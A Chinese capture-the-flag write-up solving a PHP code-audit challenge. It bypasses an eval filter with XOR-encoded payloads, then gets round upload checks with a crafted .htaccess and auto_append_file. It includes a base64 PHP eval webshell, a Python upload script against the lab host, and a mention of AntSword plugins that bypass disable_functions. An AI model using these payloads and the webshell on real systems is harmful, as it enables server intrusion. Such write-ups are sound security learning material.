代码审计
进入页面即是代码,进行审计
命令执行部分
1. <?php 2. 3. $hhh = @$_GET['_']; 4. 5. if (!$hhh){ 6. highlight_file(__FILE__); 7. } 8. 9. if(strlen($hhh)>18){ 10. die('One inch long, one inch strong!'); 11. } 12. 13. if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) ) 14. die('Try something else!'); 15. 16. $character_type = count_chars($hhh, 3); 17. if(strlen($character_type)>12) die("Almost there!"); 18. 19. eval($hhh); 20. ?>
- 正则分析
\x00: ASCII码为0的字符
-: 连字符
0-9: 数字0到9
A-Za-z: 大小写字母
\'": 单引号、双引号
`: 反引号
~_&.,|=: 波浪线、下划线、&符号、逗号、竖线、等于号
[\x7F]+: ASCII码为127及以上的字符(常用于表示扩展的ASCII字符集)
其中 i 表示忽略大小写。
因此,这个正则表达式可以匹配包括数字、字母、符号以及一些特殊字符,例如扩展ASCII字符集中的字符。
这里我们用脚本直接生成payload进行绕过
文件上传部分
1. function get_the_flag(){ 2. // webadmin will remove your upload file every 20 min!!!! 3. $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); 4. if(!file_exists($userdir)){ 5. mkdir($userdir); 6. } 7. if(!empty($_FILES["file"])){ 8. $tmp_name = $_FILES["file"]["tmp_name"]; 9. $name = $_FILES["file"]["name"]; 10. $extension = substr($name, strrpos($name,".")+1); 11. if(preg_match("/ph/i",$extension)) die("^_^"); 12. if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^"); 13. if(!exif_imagetype($tmp_name)) die("^_^"); 14. $path= $userdir."/".$name; 15. @move_uploaded_file($tmp_name, $path); 16. print_r($path); 17. } 18. }
过滤了ph后缀,文件里不能有<?,而且必须是图片文件
过滤了ph后缀,一般做法是传.htaccess或者在有php文件的情况下传.user.ini,但是不满足该目录下有php文件(这里文件上传的目录不可控企鹅不可回退遍历),因此考虑上传.htaccess文件和一个图片后缀的webshell
- exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7)
exif_imagetype - 确定图像的类型
exif_imagetype()读取图像的第一个字节并检查其签名。
这里在.htaccess文件中直接添加GIF89a会影响该文件的作用导致失败
用以下两种方法让我们的.htaccess生效
1. #define width 1337 2. #define height 1337
1. 在.htaccess前添加x00x00x8ax39x8ax39(要在十六进制编辑器中添加,或者使用python的bytes类型) 2. x00x00x8ax39x8ax39 是wbmp文件的文件头 3. .htaccess中以0x00开头的同样也是注释符,所以不会影响.htaccess
文件内容不能有<?
一般是用<script language="php"></script>来绕过,但是因为这题的PHP版本是7.3.4,<script language="php"></script>这种写法在PHP7以后就不支持了,因此不行。
- 新姿势
1. #define width 1337 2. #define height 1337 3. AddType application/x-httpd-php .feng 4. php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_c41893938531041badacfc22febe3abd/123.feng
利用auto_append_file来包含b64解码的123.feng文章,这样往123.feng里面写b64解密后的马,就可以绕过<?的过滤了。
但是还有一个细节需要注意,我们的123.feng也需要是个图片,需要在前面加上GIF89a,但是这只有6个字符,需要再随便加上2个base64有的字符,这样解码的时候才能正确解码,而且不会影响到后面的PHP一句话
GIF89a00PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
密码是1
异或绕过preg_match脚本
1. <?php 2. $l = ""; 3. $r = ""; 4. $argv = str_split("_GET"); 5. for($i=0;$i<count($argv);$i++) 6. { 7. for($j=0;$j<255;$j++) 8. { 9. $k = chr($j)^chr(255); \\dechex(255) = ff 10. if($k == $argv[$i]){ 11. if($j<16){ 12. $l .= "%ff"; 13. $r .= "%0" . dechex($j); 14. continue; 15. } 16. $l .= "%ff"; 17. $r .= "%" . dechex($j); 18. continue; 19. } 20. } 21. } 22. echo "\{$l`$r\}"; 23. ?>
%ff%ff%ff%ff^%a0%b8%ba%ab //异或结果为$_GET,{$_GET}{%ff}
{%ff%ff%ff%ff`%a0%b8%ba%ab}
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
传入后实际为:
?_=${_GET}{%ff}();&%ff=phpinfo
最终利用那个文件上传函数
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag
文件上传脚本
1. import requests 2. import base64 3. 4. htaccess = b""" 5. #define width 1337 6. #define height 1337 7. AddType application/x-httpd-php .coleak 8. php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.coleak" 9. """ 10. shell = b"GIF89a00" + base64.b64encode(b"<?php eval($_REQUEST[1]);?>") 11. url = "http://4028da5b-e08f-416a-ac17-294cc9922bba.node4.buuoj.cn:81/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag" 12. 13. files = {'file':('.htaccess',htaccess,'image/jpeg')} 14. data = {"upload":"Submit"} 15. response = requests.post(url=url, data=data, files=files) 16. print(response.text) 17. 18. files = {'file':('shell.coleak',shell,'image/jpeg')} 19. response = requests.post(url=url, data=data, files=files) 20. print(response.text)
upload/tmp_f9e1016a5cec370aae6a18d438dabfa5/.htaccess
upload/tmp_f9e1016a5cec370aae6a18d438dabfa5/shell.coleak
解题思路
非预期解
在phpinfo里面找到flag
预期解
上传文件后执行命令
测试蚁剑的GC_UAF和Backtrace_UAF插件可以直接绕过disable_functions和目录限制
![[网鼎杯 2020 白虎组]PicDown(精讲)](https://ucc.alicdn.com/pic/developer-ecology/ttvoywnclpbvk_4985105ada37410ea42456dfabfbf07c.png?x-oss-process=image/resize,h_160,m_lfit)